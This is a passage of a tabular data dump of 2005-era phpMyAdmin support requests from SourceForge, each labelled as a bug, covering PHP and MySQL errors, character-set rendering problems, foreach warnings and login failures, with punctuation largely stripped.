I have been unable to see what has changed, but 2.6.3 pl1 runs fine, so it has to be some change I ve missed.
2.6.4 also triggers the same error using the config file from 2.6.3 pl1, meaning the new settings are supposed to use standard settings.
Original URL https sourceforge.net p phpmyadmin support requests 774 https sourceforge.net p phpmyadmin support requests 774 Original author cfw","bug"
"24444","2591","Big error.
MySQL 4.0.24 Debian 10 log PHP Version 4.3.10 15 Apache Version Apache 1.3.33 Debian GNU Linux) mod python 2.7.10 Python 2.3.4 PHP 4.3.10 15 mod ssl 2.8.22 OpenSSL 0.9.7d first i got error illegal offset type in grab.global.lib.php 86), there i replaced foreach server vars as current) \{ to foreach server vars as key= gt; current) \{ and now i got to log in...but then i have many many error, all i suppose from same thing foreach without array key identificator, strange but true) Warning urlencode ) expects parameter 1 to be string, array given in home www.mnt.ee.arendus.riik.ee A1 maat1234 html pma libraries url generating.lib.php on line 91 lt;b gt;Warning lt; b gt; Illegal offset type in lt;b gt; home www.mnt.ee.arendus.riik.ee A1 maat1234 ht ml pma main.php lt; b gt; on line lt;b gt;528 lt; b gt; lt;br gt; Original URL https sourceforge.net p phpmyadmin support requests 783 https sourceforge.net p phpmyadmin support requests 783 Original author finsoft Found in version 2.6.4 pl1","bug"
"24444","2592","Upgrading and Administrating questions.
first, thanks for the opensource.
phpmyadmin is really a great work.
i have some questions, i looked for the answers much but couldnt find.
How can i upgrade an installed phpMyAdmin to a newer version?
my old version is 2.6.3 and i want to upgrade to 2.6.4 i tried a clean install of 2.6.4 but i didnt have the full functionality.
for example there wasnt an option like change password as in 2.6.3.. the root account is logged in with the root password) Original URL https sourceforge.net p phpmyadmin support requests 775 https sourceforge.net p phpmyadmin support requests 775 Original author elmacik Found in version Latest Git","bug"
"24444","2593","Linked tables don t work with mixed case table names.
Linked tables do not work on Windows 2003 Server Windows 2000 SP4 client) if creating databases using mixed case table names.
If lower case names are used, then linked tables work just fine.
This occurs with lower case table names = 0 or 2.
Hint when adding a link in tableB.tableA ID, it properly displays tableB gt;tableA ID , but after selecting it and saving, it improperly displays temp.tablea.tableA ID .
Below is a dump.
Note the improper tablea reference in the constraint.
Perhaps linked tables breaking is actually a symptom of an improperly added constraint.
Hope this helps.... Marco Moreno phpMyAdmin SQL Dump version 2.6.4 http www.phpmyadmin.net Host localhost Generation Time Sep 30, 2005 at 05 55 PM Server version 4.1.13 PHP Version 4.4.0 Database `temp` CREATE DATABASE `temp` DEFAULT CHARACTER SET latin1 COLLATE latin1 swedish ci; USE temp; Table structure for table `tableA` CREATE TABLE `tableA` `tableA ID` int 11) NOT NULL auto increment, `tableA data` varchar 10) NOT NULL default , PRIMARY KEY `tableA ID`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO INCREMENT=1 ; Dumping data for table `tableA` Table structure for table `tableB` CREATE TABLE `tableB` `tableB ID` int 11) NOT NULL auto increment, `tableA ID` int 10) NOT NULL default 0 , PRIMARY KEY `tableB ID`), KEY `tableA ID` `tableA ID`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO INCREMENT=1 ; RELATIONS FOR TABLE `tableB` `tableA ID` `tablea` gt; `tableA ID` Dumping data for table `tableB` Constraints for dumped tables Constraints for table `tableB` ALTER TABLE `tableB` ADD CONSTRAINT `tableb ibfk 1` FOREIGN KEY `tableA ID`) REFERENCES `tablea` `tableA ID`); Original URL https sourceforge.net p phpmyadmin support requests 785 https sourceforge.net p phpmyadmin support requests 785 Original author mmoreno","bug"
"24444","2594","problem with php5.
Fatal error Call to undefined function preg match ) in var www localhost htdocs phpmyadmin libraries defines.lib.php on line 36 This error occurs when I use php5 but not with php4 info gentoo, kernel 2.6.12.5 php 5.0.4 4.4.0 apache 2.0.54 mysql 4.1.14 Eder Ruiz Maria, holoturoide holoturoide gmail.com www.gnoia.org Original URL https sourceforge.net p phpmyadmin support requests 777 https sourceforge.net p phpmyadmin support requests 777 Original author holoturoide","bug"
"24444","2595","Problem with themes.
Hi, I have a problem with loading themes in phpMyAdmin 2.6.3 pl1.
When I change theme, phpMyAdmin reloads but comes back to Original.
More, fonts are not as they should be.
Times New Roman is used instead if Arial.
Themes and css folders are drwxrwxrwx .
I have the same problem with IExplorer and Firefox.
Can anyone help?
Thanks Claude Frascadore Original URL https sourceforge.net p phpmyadmin support requests 778 https sourceforge.net p phpmyadmin support requests 778 Original author cfrasc","bug"
"24444","2596","Browse and SELECT on any table does not work.
Server Windows Server 2003 PHP Version 5.0.3 MySQL 4.0.21 nt running on root as root localhost PMA version 2.6.4.
Whenever I go to Browse or SELECT records from a table, I get the following error PHP has encountered an Access Violation at 096C589C.
Many other users have encountered this error on different versions of each product listed above, as per the forum.
But I have looked around the bug area and couldn t find a fix for it, so I am listing it.
So far, I can execute any SQL Statement except for SELECT when the table returns records.
So there must be something wrong with the SELECT statement somewhere in sql.php.
I have tried the following suggestions from the forums BTW I do NOT have Zend installed) Change memory allocation in php.ini to 16M.
Changed output handler = ob gzhandler; Tried to see if there as a more detailed error by setting the following php.ini parameters error reporting = E ALL E STRICT display errors = On log errors = On error log = php error.log But the only thing I get is that Access Violation, and no php error.log file is created.
I also made sure to restart IIS 6.0 after these changes were made on php.ini.
Tried versions 2.6.0 gt; 2.6.4 of phpMyAdmin.
Gave Full Access to the user accessing the entire phpMyAdmin folders.
If you wish to look at the site, go here http preview.gxtweb.com phpMyAdmin I have removed the security so you can get in.
Go to gxtcms and click on user table and try to browse or select that record, it will give you that error.
I am running IE 6.0.2900.2180 on Windows XP SP2 on the client side.
I have not tried other versions of PHP or MySQL yet, but if I need to, I can upgrade or downgrade them upon your suggestions.
I have attached the error page as a screenshot.
Thank you, Angel Henriquez Original URL https sourceforge.net p phpmyadmin support requests 779 https sourceforge.net p phpmyadmin support requests 779 Original author xdoc482","bug"
"24444","2597","SQL Import fails due to TYPE ENGINE difference.
Hi, I m running two systems with different MySQL versions, development machine has always the newest version while our production server has still some older setup.
Exporting the SQL data on the system with the older MySQL version, the export file shows TYPE=MYISAM while the export of the newer MySQL version shows ENGINE=MYISAM .
This is hard to handle as the older version does not accept the ENGINE=MYISAM structure and quits with an error, so I have to manually edit the SQL files before I can import them in the production environment.
Question Is there any setup to control the behavior of the newer setup so PMA will create SQL files using the TYPE= structure?
Best regards, Hans Peter Original URL https sourceforge.net p phpmyadmin support requests 780 https sourceforge.net p phpmyadmin support requests 780 Original author hps kxbmw","bug"
"24444","2598","Handling of special characters in tables names.
phpMyAdmin 2.6.3 pl1 MySQL 4.1.13 Server free.fr Hi, I created tables with french accents in their names or in the columns names.
It worked fine.
My provider did change the version of MySQL and since then I can t access my tables with accents in their names not even delete it) either through phpMyAdmin nor php directly don t know the version but quite recent) See below the code I tried to access the 5th table and rename it in Serie.
mysql connect localhost, username, password); mysql select db database) or die Unable to select database ); query liste livre = SHOW TABLES ; result = mysql query query liste livre); lignenb = 1; while line = mysql fetch row result)) \{ colnb = 0; foreach line as col value) \{ colnb ; echo lt;P gt; lignenb, colnb) = gt; col value lt; P gt; ; if lignenb == 5 and colnb == 1) \{ tableren = col value; Extract the returned name of the table for further processing \} \} lignenb ; \} echo \n ; mysql free result result); Rename the table here.
query renomme table = RENAME TABLE ` tableren ` TO Serie ; result = mysql query query renomme table) or die Query failed ); mysql free result result); mysql close ); The language selected for my database if fr utf 8 and I can only set utf8 values for the language.
I know the problem seems to come from an interface between the three of the implied tools SQL, PHP and ADMIN) but as PHPMYADMIN is my only way to access my table, I hope you will have some idea to correct this problem.
Thanks for trying to help me.
PS I swear to never do this again putting special characters in some code!
Never.
Original URL https sourceforge.net p phpmyadmin support requests 781 https sourceforge.net p phpmyadmin support requests 781 Original author jerome31","bug"
"24444","2599","I cant get phpmyadmin to work.
i got phpadmin installed finally.
now i try to run a sql command to create a table and i get the following errors please provid eme with steps to resolve this thank you someone please help Warning Wrong parameter count for rtrim ) in var www html phpmyadmin libraries read dump.lib.ph p on line 23 Warning Cannot add header information headers already sent by output started at var www html phpmyadmin libraries read dump.lib.ph p 23) in var www html phpmyadmin libraries ob.lib.php on line 61 Warning Cannot add header information headers already sent by output started at var www html phpmyadmin libraries read dump.lib.ph p 23) in var www html phpmyadmin libraries header http.inc.p hp on line 14 Warning Cannot add header information headers already sent by output started at var www html phpmyadmin libraries read dump.lib.ph p 23) in var www html phpmyadmin libraries header http.inc.p hp on line 15 Warning Cannot add header information headers already sent by output started at var www html phpmyadmin libraries read dump.lib.ph p 23) in var www html phpmyadmin libraries header http.inc.p hp on line 16 Warning Cannot add header information headers already sent by output started at var www html phpmyadmin libraries read dump.lib.ph p 23) in var www html phpmyadmin libraries header http.inc.p hp on line 17 Warning Cannot add header information headers already sent by output started at var www html phpmyadmin libraries read dump.lib.ph p 23) in var www html phpmyadmin libraries header http.inc.p hp on line 20 Original URL https sourceforge.net p phpmyadmin support requests 782 https sourceforge.net p phpmyadmin support requests 782 Original author petenyce","bug"
"24444","2600","MySQL crash on SHOW TABLE STATUS FROM.
Windows 2003 Enterprise, IIS 6.0, PHP 5.0.2, MySQL 4.1.7 nt I m getting sporadic crashes of mysql when I use phpmyadmin.
I believe the key to the bug is that the crash only occurs when I launch phpmyadmin for the first time once I m in, I never get the crash later.
This only happens with phpmyadmin.
It does not happen with any of several other php mysql packages I use on the same server.
IIS and PHP remain up and running, it is only mysql that crashes.
Restarting mysql and refreshing the browser with phpmyadmin fixes the problem, though sometimes I have to restart mysql more than once.
It doesn t happen every time, but I d say it happens about 70 of the time.
Can t reliably reproduce it, but it happens over and over.
From the event log The MySQL service terminated unexpectedly.
It has done this 38 time s).
From the mysql log 050928 14 52 40 InnoDB Database was not shut down normally!
InnoDB Starting crash recovery.
InnoDB Reading tablespace information from the .ibd files... InnoDB Restoring possible half written data pages from the doublewrite InnoDB buffer... 050928 14 52 40 InnoDB Starting log scan based on checkpoint at InnoDB log sequence number 0 274608.
InnoDB Doing recovery scanned up to log sequence number 0 274608 050928 14 52 41 InnoDB Flushing modified pages from the buffer pool... 050928 14 52 41 InnoDB Started; log sequence number 0 274608 Original URL https sourceforge.net p phpmyadmin support requests 784 https sourceforge.net p phpmyadmin support requests 784 Original author mchargue Found in version 2.6.4 pl1","bug"
"24444","2601","can t NOT auto increment.
when creating a table, in the dropdown box for extra there s auto increment but not an option to NOT auto increment like for a varchar , text , blob , etc) this bitmap shows what I m talking about http www.notawhore.com img dropdown.bmp output is CREATE TABLE `news` `news id` INT UNSIGNED NOT NULL AUTO INCREMENT , `title` TEXT UNSIGNED NOT NULL AUTO INCREMENT ) TYPE = innodb CHARACTER SET armscii8 COLLATE armscii8 bin MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near UNSIGNED NOT NULL AUTO INCREMENT) TYPE = innodb CHARACTER SET armscii8 COLLATE a at line 1 Original URL https sourceforge.net p phpmyadmin support requests 786 https sourceforge.net p phpmyadmin support requests 786 Original author thmnetwork Found in version 2.6.4 pl1","bug"
"24444","2602","error when inserting blob data in mysql with phpmyadmin.
I need help..
When I try to insert a row with image or mp3 file, as a longblob, with phpmyAdmin tool, I get this message Fatal error Maximum execution time of 30 seconds exceeded in usr local cpanel base 3rdparty phpMyAdmin libraries string.lib.php on line 91 I ask my host provider and he increased the max allowed packet on 16MB, so from the side of mysql limits everything should work fine..
So where is a problem?
Please suggest me some solution or workaround..
Thank you!
Kind Regards, Jelena Original URL https sourceforge.net p phpmyadmin support requests 787 https sourceforge.net p phpmyadmin support requests 787 Original author jelena7","bug"
"24444","2603","File import after export.
Hello, I have columns where there are xc3xa9,xc4x8d,xc5x95, ... in the text fields.
When I try to export it to a file not zipped), the file looks good.
But if I import it again, I get strange things at the places where the xc3xa9,xc4x8d,xc5x95, ... are.
I tried all the character sets.
But nothing works.
How can I solve this?
Kind regards Original URL https sourceforge.net p phpmyadmin support requests 788 https sourceforge.net p phpmyadmin support requests 788 Original author mmdesign Found in version 2.6.4 pl1","bug"
"24444","2604","passwords are not created correctly?).
When giving a new user a password or changing that user with deleting the old one the password is not saved correctly or not saved at all.
When I change the password with the change password fields privileges gt;change user gt;change password) it works and that user can login via shell or php.
The password contains alphanumeric characters.
I m running gentoo linux with phpmyadmin 2.6.4 pl3 mysql 4.1.14 apache 2.0.54 r31 php 4.4.0 r4 Klaus Original URL https sourceforge.net p phpmyadmin support requests 797 https sourceforge.net p phpmyadmin support requests 797 Original author leviathan09","bug"
"24444","2605","Character collation.
I have a database with french characters.
Database collation is latin1 general ci.
At phpMA front page I choice MySQL connection collation as latin1 general ci.
If I want to export and save content to file, every french character in the file is messed up like the connection collation is utf8.
If I export the database inline in browser and copy paste into a text editor, characters collation works.
I am using phpMA 2.6.4 pl1,php 4.3.10.mysql 4.1.10.
I try the same thing on multiple configurations, and it gets me the same thing.
Original URL https sourceforge.net p phpmyadmin support requests 798 https sourceforge.net p phpmyadmin support requests 798 Original author jonibi Found in version 2.6.4 pl1","bug"
"24444","2606","phpMyAdmin rendering glitch.
Here s a description of a situation.
Recently, phpMyAdmin was automatically updated to version 2.6.3 pl1 patch level 1) which is the most stable release as of this writing.
Immediately phpMyAdmin was not able to correctly display data stored in MySQL tables encoded as Arabic Windows 1256 or cp 1256) In the new home page of phpMyAdmin http www.domain.com phpMyAdmin index.php) there are a.
A Language drop dwon list which identifies the language in which further phpMyAdmin pages will be rendered by the browser.
The options in this drop dwon list include many languages, unfortuantely all of them in the xx utf 8 format.
This is a key issue here.
Earlier versions allowed non unicode rendering possibilities such as Arabic win 1256) along with many others.
I don t understand why this was removed, forcing users into using unicode only.
b.
A MySQL charset with only the option of UTF 8 Unicode utf8) c. A MySQL connection collation and the options range from choosing no collation at all to various unicode and non unicode collation.
I d like to stress here that we er tackling a rendring problem i.e how the browser renders the characters sent to it by the webserver, not the format in which the data are actually stored in MySQL.
This clear distinction explains many things.
All the site pages that read data from or writes data into MySQL display and store the characters correctly, because they tell the browser explicitly how they are encoded.
This is achieved by this html line present in all of the site pages lt;meta http equiv= Content Type content= text html; charset=windows 1256 gt; Now phpMyAdmin pages doesn t have such a line.
In fact a view gt;source of any phpMyAdmin page will show a line such as this one lt;meta http equiv= Content Type content= text html; charset=utf 8 gt; with a subesquent lt;link rel= stylesheet type= text css href= .
css phpmyadmin.css.php?lang=xx utf 8 amp;amp;js frame=right gt; defining the style sheet to be used to render the page where xx utf 8 corresponds to the chosen Language originally set in the phpMyAdmin home page, e.g.
en utf 8, ar utf 8, etc.
The above explains everything.
phpMyAdmin pages WILL NOT BE ABLE TO DISPLAY ANY NON ENGLISH CHARACTERS RETRIEVED FROM MYSQL UNLESS THEY WERE SAVED IN THE DATABASE AS UTF ENCODED ENTITIES.
If unfortunately you store your non english data in anyway other than utf, phpMyAdmin will display them as gebberish.
Plain and simple.
Now how we can overcome this problem?
1\.
Ask phpMyAdmin development team to allow the option of non utf rendering from the Language drop down list in its home page.
This was available in previous versions of phpMyAdmin.
2\.
Ask the browser here, Internet Explorer) to render the phpMyAdmin pages with the encoding we want using its function view gt;encoding gt;xxxxx .
Unfortunately this is not attainable.
The phpMyAdmin development team intentionally chose to include a lang=xx utf 8 in the http request header of each and every phpMyAdmin page, where the value xx utf 8 is the one set at the very begining home page of phpMyAdmin by your choice of the Language Do this exercise Suppose you have a database called my schema, and a table in that database storing non English content and is called my table.
Now ... a. Login to phpMyAdmin, choose whatever combination of language and collation you want .. it doesn t really matter b.
From the left hand drop down list chose your my schema database c. A list of tables with my table now should appear in the left hand frame of the phpMyAdmin home page.
d. Now move your mouse over my table whcih is a link), right click and choose copy shortcut e. Start Notepad or your favorite plain text editor, and do a paste.
What you would get is something like this http www.domain.com phpMyAdmin tbl properties stru cture.php?lang=xx utf 8 server=1 collation connection=xxxxxxx db=my sch ema table=my table As you can see, the http request explicitly states page encoding with this parameter in the string lang=xx utf 8 and collation connection=xxxxxx exactly as set by the first chosices in step a.
We are stuck with these options all through the phpMyAdmin session.
f. Now click on the my table link.
You should now see the table stucture in the right hand frame of the phpMyAdmin page.
g. Reach up to the Browse link, and repeat the procedure in d and e What you would get is something like this http www.domain.com phpMyAdmin sql.php?lang=xx utf 8 server=1 collation connection=xxxxxxxx db=my sc hema table=my table goto=tbl properties structure.ph p back=tbl properties structure.php sql query=SELE CT 2A FROM 60my table 60 pos=0 h. Click on the Browse link.
You now see the first 30 records of your table, with gebberish replacing your non English conent of my table records.
i.
Now tell Internet Explorer to use another encoding by using view gt;encoding gt;xxxxx .
Since this page is a dynamically generated one, what IE will really do is submit the http request to the server again exactly as shown in g resulting in the page dispalyed with lang=xx utf 8 encoding, and effectively nullifying the purpose of the request.
j.
Now someone might say let s try this with FireFox.
Great.
This will only help to solidfy the explanation of this bug .
FireFox instead of resubmitting the http request to the server will try to work on the locally cached version first.
Alas, in this situation FireFox has a problem in translating this gebberish to win 1256 codes properly.
It does translate this gebbberish into Arabic, but with mismatched characters, resulting in a meaningless content.
In other cases, it might not have this translation problem.
So this might really work.
Now we come to the last option 3\.
Re encode the content in the database into UTF 8.
This is really such an awkward solution.
In order to overcome a glitch lack of feature in phpMyAdmin we re going to destory a functioning site.
Unless we really intended to do this conversin of a non English non Unicode site and non Enlgish non Unicode database content into Unicode, but never had the time to do it, this might be the correct time.
Other than this, I don t see regardless of the means or the tricks needed to do the actual conversion how we can break the code of the site pages that read and write into MySQL correctly, in whatever encoding that was origianlly chosen when the site was originally developed, only to get phpMyAdmin to display the data correctly.
Conclusion phpMyAdmin in its current version supports only utf connection to MySQL and utf rendring of the resulting pages.
phpMyAdmin should allow rendering of data encoded in ways other than xx utf 8 Your comments are welcome.
moallam Original URL https sourceforge.net p phpmyadmin support requests 789 https sourceforge.net p phpmyadmin support requests 789 Original author moallam","bug"
"24444","2607","DATE, DATETIME columns SELECT IS NULL.
http dev.mysql.com doc refman 5.0 en comparison operators.html IS NULL IS NOT NULL For DATE and DATETIME columns that are declared as NOT NULL, you can find the special date 0000 00 00 by using a statement like this SELECT FROM tbl name WHERE date column IS NULL Original URL https sourceforge.net p phpmyadmin support requests 790 https sourceforge.net p phpmyadmin support requests 790 Original author obiserver","bug"
"24444","2608","privileges shown even if user does not have.
hi, on debian sarge mysql Ver 14.7 Distrib 4.1.11, for pc linux gnu i386) PHP Version 4.3.10 16 using cookie authentication with read only user) phpmyadmin 2.6.4 pl3 shows all users databases in the left frame and asks for create database even if user does not have right.
MySQl handles correctly because browing another users database is not allowed nor new database creatin that phpmyadmin correctly raports as error.
On other system, even other operating systems with older MySQL engine it works perfect with same config file just user s database is shown and database creation is noted that user does not have permission) Thank you in advance.
Original URL https sourceforge.net p phpmyadmin support requests 791 https sourceforge.net p phpmyadmin support requests 791 Original author a zoli","bug"
"24444","2609","can t add a user or drop a database.
this is this page... http irresistiblestars.com phpMyAdmin when I try to add a user or drop a database I get 2000 Unknown MySQL error Original URL https sourceforge.net p phpmyadmin support requests 792 https sourceforge.net p phpmyadmin support requests 792 Original author matthewgomez","bug"
"24444","2610","2000 Unknown MySQL error.
Hi My problem is i cant do anything in phpMyAdmin 2.6.3 pl1 If i want to drop a database or add a database it will give me that error.
Or if i want to add a user or add privelages it will give me that error again..
The whole thing is a error.
What can i do to not get this errors?
Original URL https sourceforge.net p phpmyadmin support requests 793 https sourceforge.net p phpmyadmin support requests 793 Original author sledcrew","bug"
"24444","2611","Problem in user authentification.
After upgrading phpMyAdmin zu 2.6.4pl3 and MySQL to 4.1.14 Debian 6 log some users couldn t log in.
When looking at the mysql usertable there were some users the older ones) that have passwords like 59dcf35600c450d0 .
Newer users have passwords like D4295E78E52DE2D4379F7FB69B3F2BEAE4536FD8 mind the ).
Those users with the new style passwords) are not able to log on using phpMyAdmin.
The passwords have been altered due to security reasons, but the effect should be clear.
Original URL https sourceforge.net p phpmyadmin support requests 794 https sourceforge.net p phpmyadmin support requests 794 Original author spenser","bug"
"24444","2612","incompatibility with port forwarding.
phpMyAdmin cannot load images and stylesheets from server behide firewall with port forwarding.
Let s say, my web server inside firewall) open port 81 for HTTP and setup my firewall to forward port 80 from outside into port 81 at my web server.
When you browse phpMyAdmin pages from outside firewall, all pages appear, but without stylesheet and images.
If you view source, you will see that all images and stylesheets URLs are point to http domain 81 .
Please not that I doesn t set cfg[ PmaAbsoluteUri ].
Sorry about my poor written English.
Oo ) Original URL https sourceforge.net p phpmyadmin support requests 795 https sourceforge.net p phpmyadmin support requests 795 Original author taworn","bug"
"24444","2613","A syntax error in a query that runs fine in version 2.6.3pl1.
I run the following SQL query on version 2.6.3 pl1 with no problems from SQL tab of a database SELECT FROM campaigns WHERE NOT EXISTS select from locations where campaigns.Location = locations.Name ) but when I copy paste the above to version 2.6.4 pl2 I get a parser error 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near EXISTS select from locations where campaigns .
Location .... Will appreciate any comments.
Original URL https sourceforge.net p phpmyadmin support requests 796 https sourceforge.net p phpmyadmin support requests 796 Original author volodya666","bug"
"24444","2614","FAQ Error 1.1.
[1.1] I m running PHP 4 and my server is crashing each time a specific action is required or phpMyAdmin sends a blank page or a page full of cryptic characters to my browser, what can I do?
There are some known PHP bugs with output buffering and compression.
Try to set the cfg[ OBGzip ] directive to FALSE in your config.inc.php file and the zlib.output compression directive to Off in your php configuration file.
Furthermore, we know about such problems connected to the release candidates of PHP 4.2.0 tested with PHP 4.2.0 RC1 to RC4) together with MS Internet Explorer.
Please upgrade to the release version PHP 4.2.0.
I changed this and im still experiencing errors any ideas?
I ve installed this on two machines and I have the same problem php 4.4.1 apache and newest mysql any ideas?
thanks Original URL https sourceforge.net p phpmyadmin support requests 799 https sourceforge.net p phpmyadmin support requests 799 Original author soul814","bug"
"24444","2615","URI contain unnecessary slash.
when index.php was loaded, all links have excess slash like this http host querywindow.php?lang=... also this is apparent in apache log Original URL https sourceforge.net p phpmyadmin support requests 800 https sourceforge.net p phpmyadmin support requests 800 Original author grickoff","bug"
"24444","2616","Failure to grant privilages.
I would like to install wordpress on our Yahoo small business site, but cannot because I am unable to grant privilages to the created wordpress database.
My User which was created upon activating mysql in my yahoo control panel has a paswword.
There is also the yroot which has access all areas!
, but i cannot sign in as the yroot user for the simple fact that I don t know the password and have no way of creating a new one though Yahoo that I can find.
Please help me.
I am on a deadline.
I have a full animation to create and get online before we go live and I don t even have the blog up yet!
I have attached a copy of the error I get I would be happy to answer any questions.
I realize that I am new to this and have probably done something stupid, but I don t know what it is and I am running out of time.
I have re installed phpmyadmin a couple of times to no effect and do not know how to deactivate msql in yahoo and start over.
Please Help.
Original URL https sourceforge.net p phpmyadmin support requests 801 https sourceforge.net p phpmyadmin support requests 801 Original author preposterous","bug"
"24444","2617","Table Browse function.
Everything within the phpmyadmin interface is working jsut fine for me except the browse function.
I first select a database, then a table and the select browse at the top left.
This just hangs and eventually times out.
Again, all other functionality is there.
I have tested running a select from table; from the command line and this works just fine.
I was under the impression this is the same thing the browse function does.
In the configuration file here is what is set under browse mode In browse mode... cfg[ ShowBlob ] = FALSE; display blob field contents cfg[ NavigationBarIconic ] = both ; Use icons instead of text for the navigation bar buttons and on right panel top menu server db table) TRUE|FALSE| both ) cfg[ ShowAll ] = FALSE; allows to display all the rows cfg[ MaxRows ] = 30; maximum number of rows to display cfg[ Order ] = ASC ; default for ORDER BY clause valid values are ASC , DESC or SMART ie descending order for fields of type TIME, DATE, DATETIME TIMESTAMP, ascending order else ) Any suggestions on a fix would be great!
Original URL https sourceforge.net p phpmyadmin support requests 802 https sourceforge.net p phpmyadmin support requests 802 Original author jmeyershms","bug"
"24444","2618","localhost error.
I installed phpMyAdmin just fine and everything was going well.
I just recently changed the authentication settings from config to cookies and that worked like I expected it too.
But now when I click on, or try to navigate to, my http localhost page I get an error that says Apache.exe needs to be shut down.
Then it pops up a couple of error messages that says PHP Startup Unable to load dynamic library c wamp php ext php pdo sqlite.dll The specified module could not be found.
and PHP Startup Unable to load dynamic library c wamp php ext php sqlite.dll The specified module could not be found.
However when I go to where they are suppose to be both of the dll s are there.
So basically my PHP won t work, I can t access my localhost and I m not entirely sure why.
Can anybody help?
Thanks.
CJ mr.andersen cox.net Original URL https sourceforge.net p phpmyadmin support requests 811 https sourceforge.net p phpmyadmin support requests 811 Original author clintonandersen","bug"
"24444","2620","mbstring.
on installing phpmyadmin I get the following error The mbstring PHP extension was not found and you seem to be using multibyte charset.
Without mbstring extension phpMyAdmin is unable to split strings correctly and it may result in unexpected results.
Does anybody know how to resolve this Cheers Mally Original URL https sourceforge.net p phpmyadmin support requests 804 https sourceforge.net p phpmyadmin support requests 804 Original author mally b","bug"
"24444","2621","foreach short version) fails.
os Windows 2000 Advanced Server SP4 web server IIS 5.0 php 4.3.10 ISAPI) mysql 4.1.9 nt max phpmyadmin 2.6.4 pl4 Problem with shortened form of PHP foreach function.
bad foreach array expression as value) good foreach array expression as key = gt; value) common error Warning Illegal offset type in...
Following phpMyAdmin files are afflicted db details qbe.php 719) foreach Field AS value) \{ db details qbe.php 771) foreach tab all AS tab) \{ db details qbe.php 838) foreach col cand AS tab) \{ db details qbe.php 954) foreach tab left AS tab) \{ db details structure.php 179) foreach array keys tables temp) as each) \{ db details structure.php 184) foreach array keys tables sort) as each) \{ export.php 407) foreach dblist AS current db) \{ export.php 415) foreach tables as table) \{ export.php 439) foreach tables as table) \{ left.php 445) foreach dblist temp as each) \{ main.php 523) foreach available themes choices AS cur theme) \{ mult submits.inc.php 250) foreach views as current) \{ pdf pages.php 113) foreach all tables AS master table) \{ pdf pages.php 115) foreach foreigners AS foreigner) \{ pdf pages.php 123) foreach foreign tables AS foreign table) \{ pdf pages.php 137) foreach all tables AS current table) \{ pdf pages.php 215) foreach delrow AS current row) \{ pdf schema.php 588) foreach this gt;fields AS field) \{ pdf schema.php 645) foreach this gt;fields AS field) \{ pdf schema.php 1006) foreach this gt;relations AS relation) \{ pdf schema.php 1024) foreach this gt;tables AS table) \{ pdf schema.php 1158) foreach alltables AS table) \{ pdf schema.php 1196) foreach alltables AS one table) \{ pdf schema.php 1243) foreach alltables AS table) \{ pdf schema.php 1268) foreach alltables AS table) \{ queryframe.php 302) foreach dblist temp as each) \{ server binlog.php 36) foreach binary logs as name) \{ server binlog.php 81) foreach serverProcesses as value) \{ server collations.php 61) foreach mysql charsets as current charset) \{ server collations.php 85) foreach mysql collations[ current charset] as current collation) \{ server databases.php 123) foreach dblist AS current db) \{ server databases.php 238) foreach statistics as current) \{ server export.php 39) foreach dblist AS current db) \{ server privileges.php 82) foreach av grants as current grant) \{ server privileges.php 91) foreach grants as current grant) \{ server privileges.php 192) foreach av grants as current grant) \{ server privileges.php 216) foreach row1[1] as current) \{ server privileges.php 908) foreach queries as sql query) \{ server privileges.php 926) foreach queries as sql query) \{ server privileges.php 1329) foreach pred db array as current db) \{ server privileges.php 1351) foreach pred tbl array as current table) \{ server privileges.php 1555) foreach current privileges as current) \{ sql.php 483) foreach analyzed sql[0][ select expr ] as part) \{ tbl change.php 188) foreach primary key array AS primary key) \{ tbl properties structure.php 570) foreach aryFields AS fieldname) \{ tbl relation.php 538) foreach save row AS row) \{ tbl replace.php 49) foreach primary key AS pk) \{ tbl replace.php 64) foreach primary key AS pk) \{ themes.php 87) foreach available themes choices AS PMA Theme) \{ libraries\common.lib.php 686) foreach mysql error words as mysql error word) \{ libraries\common.lib.php 696) foreach tmp fields as tmp field) \{ libraries\common.lib.php 2052) foreach tabs as tab ) libraries\common.lib.php 2134) foreach query parts AS query pair) \{ libraries\common.lib.php 2256) foreach params AS param) \{ libraries\common.lib.php 2503) foreach pages AS i) \{ libraries\display export.lib.php 274) foreach compats as x) \{ libraries\display tbl.lib.php 492) foreach ret keys as row) \{ libraries\display tbl.lib.php 693) foreach analyzed sql[0][ table ref ] as tbl) \{ libraries\ip allow deny.lib.php 255) foreach rules AS rule) \{ libraries\grab globals.lib.php 91) foreach server vars as current) \{ libraries\mysql charsets.lib.php 329) foreach mysql charsets as current charset) \{ libraries\mysql charsets.lib.php 336) foreach mysql collations[ current charset] as current collation) \{ libraries\relation.lib.php 309) foreach analyzed sql[0][ foreign keys ] AS one key) \{ libraries\tbl indexes.lib.php 64) foreach index types AS index type) \{ libraries\tbl indexes.lib.php 94) foreach ret keys as row) \{ libraries\transformations.lib.php 22) foreach transform options as val) \{ libraries\fpdf\fpdf.php 1123) foreach this gt;PageLinks[ n] as pl) libraries\fpdf\fpdf.php 1164) foreach this gt;diffs as diff) libraries\fpdf\fpdf.php 1319) foreach this gt;fonts as font) libraries\fpdf\fpdf.php 1325) foreach this gt;images as image) libraries\fpdf\ufpdf.php 40) foreach codepoints as cp) Original URL https sourceforge.net p phpmyadmin support requests 805 https sourceforge.net p phpmyadmin support requests 805 Original author clintfoster","bug"
"24444","2622","Cannot Display Chinese Properly In UTF 8 Linux Envirnoment.
My System Linux default charset=utf8) phpmyadmin2.6 mysql4.1 Index String index.php?lang=en utf 8 server=1 collation connection=utf8 general ci To properly display chinese, I have to modify the fllowing code 1\.
In phpmyadmin libaries select lang.lib.php Line 171 Replace zhtw big5 = gt; array zh[ ] tw|hk)|chinese traditional , chinese traditional big5 , zh TW ) with twbig5 utf 8 = gt; array zh[ ] tw|hk)|chinese traditional , chinese traditional big5 , zh TW ), The reason for changing zhtw big5 to twbig5 utf 8 is that ,whenever phpmyadmin2.6 met mysql4.1, it will always search for utf 8.
2\.
In phpmyadmin libaries select lang.lib.php Line 240, Replace big5 = gt; big5 with big5 = gt; latin1 , Line 257,Replace utf 8 = gt; utf 8 with utf 8 = gt; latin1 Since the linux itself is already utf 8, it makes no point to do or attempt to do extra charset conversion.
Joe Original URL https sourceforge.net p phpmyadmin support requests 806 https sourceforge.net p phpmyadmin support requests 806 Original author freetogo","bug"
"24444","2623","Parse error when browsing a table.
